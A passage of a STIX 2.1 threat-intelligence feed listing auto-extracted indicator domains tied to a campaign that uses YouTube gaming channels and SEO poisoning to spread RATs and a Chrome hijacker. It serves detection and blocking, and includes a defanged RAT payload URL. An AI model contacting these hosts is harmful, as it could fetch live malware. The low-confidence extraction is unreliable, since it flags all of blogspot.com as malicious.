News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b2a73bf2-fbb0-46e0-a072-631c90f0c145","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: agreementjuice.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ;","pattern":"[domain-name:value = 'agreementjuice.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d4a7ec18-7113-4589-9a58-f5fdbfa4bc1c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: airplaneiron.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: n[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ;","pattern":"[domain-name:value = 'airplaneiron.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--46ab1a39-a0fc-4809-88e2-6617cf9b657b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: airtwig.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: rew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[","pattern":"[domain-name:value = 'airtwig.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc44e5c5-1fb7-4deb-afb3-bcc73b10c5f2","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: amazingshield.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: a.js Stage-three Node.js Insomnia RAT agent URL hxxp[:]//aa.amazingshield[.]xyz/33244556546.py Stage-three Python Insomnia RAT agent URL","pattern":"[domain-name:value = 'amazingshield.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1e0f9088-45a2-4358-ac3b-a82a990fe79b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: amountfuel.icu","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: reementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 g","pattern":"[domain-name:value = 'amountfuel.icu']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ca79a560-974d-4776-bd59-b7ea64092421","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: animalrecord.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: e ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 gate and landing infra","pattern":"[domain-name:value = 'animalrecord.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f18bdb85-e3bb-4342-9268-cc261b9ff894","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: animalview.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: o OfferLoader payload handoff and second-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.","pattern":"[domain-name:value = 'animalview.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d91af67-135c-401b-8690-042cba50d8da","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: apparatustaste.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: infrastructure Domain connect.activitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ;","pattern":"[domain-name:value = 'apparatustaste.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3165912a-49ac-4d9d-ae81-42f79113d2b5","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: apparatustruck.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: z ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 gate and landing infrastructure Domain appare","pattern":"[domain-name:value = 'apparatustruck.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--81ed4c21-35e4-4fab-8e58-115401a694e5","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: apparelplate.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ck[.]xyz CL-CRI-1171 gate and landing infrastructure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[","pattern":"[domain-name:value = 'apparelplate.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--071760b3-30ae-43db-9f87-5c5578d91bbb","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: archairport.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: te and landing infrastructure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]","pattern":"[domain-name:value = 'archairport.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--79371316-a66a-41ab-a3b2-45474bbf85d3","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: armcard.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ctivitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz","pattern":"[domain-name:value = 'armcard.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d9178fad-42f1-4c8e-9116-71bdee6e4560","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: atthelake.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: allback, and script infrastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[","pattern":"[domain-name:value = 'atthelake.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5b69c444-30c6-47f1-888b-c16998c2bac2","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: authoritykittens.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: structure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; ba","pattern":"[domain-name:value = 'authoritykittens.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e55ad7d-913b-42bd-b96e-637d15f31af4","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: babyvein.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz","pattern":"[domain-name:value = 'babyvein.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--12cf490b-d0e5-41a7-a12d-90b3526e6c55","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: badgeterritory.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; con","pattern":"[domain-name:value = 'badgeterritory.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e0ebc945-09d4-466c-abc0-16bf4c131f7b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: badgewing.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: hairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[","pattern":"[domain-name:value = 'badgewing.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--359c6746-8870-4849-8089-d4f3eb209abf","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bagcare.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: uthoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumo","pattern":"[domain-name:value = 'bagcare.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4e0d11d0-3292-4f33-bfb9-ab904d1d3f7f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: baitmetal.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz","pattern":"[domain-name:value = 'baitmetal.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4f9e3831-7e60-44db-a554-f5e418f0c62f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: basesfile.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstor","pattern":"[domain-name:value = 'basesfile.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--98791f5f-7e1a-46f0-8c84-8b03e29b3ad1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: basesfiles.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: frastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace","pattern":"[domain-name:value = 'basesfiles.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--242cc2b0-cbe5-4aeb-b25e-a720797a9b33","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: basinpleasure.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesir","pattern":"[domain-name:value = 'basinpleasure.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c5430737-e5a2-47db-9ffb-83de4a5d72ca","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: basketballyear.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture","pattern":"[domain-name:value = 'basketballyear.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dbd70102-1164-4c30-9254-5aaac8014130","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: baskethumor.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: care[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplaygro","pattern":"[domain-name:value = 'baskethumor.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--378b485f-92f5-470e-b5b6-11076a8dcae2","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bedroomdesire.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: pleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonke","pattern":"[domain-name:value = 'bedroomdesire.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ffe83f26-cbb1-432d-ad39-978130683b9c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: beefteeth.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xy","pattern":"[domain-name:value = 'beefteeth.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a21688f6-bac8-4c94-9b43-7bab638bf8ce","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: beliefpicture.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: tballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymag","pattern":"[domain-name:value = 'beliefpicture.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--321ad6d6-0323-4898-8516-922f1c598a40","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: believesisters.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]x","pattern":"[domain-name:value = 'believesisters.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aac55df1-fac2-402d-980e-8dbaa158954c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bellplayground.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[","pattern":"[domain-name:value = 'bellplayground.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--358160bd-68e3-4a4a-868c-a5ecdde80c32","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bikesdonkey.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: desire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychick","pattern":"[domain-name:value = 'bikesdonkey.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--036c6ec0-dd6c-428f-8b38-5b73bf9dfa62","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: birthdaymagic.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: picture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]","pattern":"[domain-name:value = 'birthdaymagic.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cddae92d-abd8-4317-8f9b-2538c175357b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: blogspot.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ferLoader installation-tracker infrastructure Domain velfps.blogspot[.]com ; velvoxlab.blogspot[.]com ; venrx.blogspot[.]com ; venrx","pattern":"[domain-name:value = 'blogspot.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b29f018-b8e0-4f0d-b29a-3a7ae7f532e0","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: boardmagic.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader in","pattern":"[domain-name:value = 'boardmagic.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9d2c61b6-dab6-4ae3-aca3-11d63591994f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: boatthought.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[","pattern":"[domain-name:value = 'boatthought.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--40c1c358-113e-44a5-8ff2-ddb474008ccb","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: boundarychickens.xyz","description":"Seen in \"Hackers Abuse YouTube 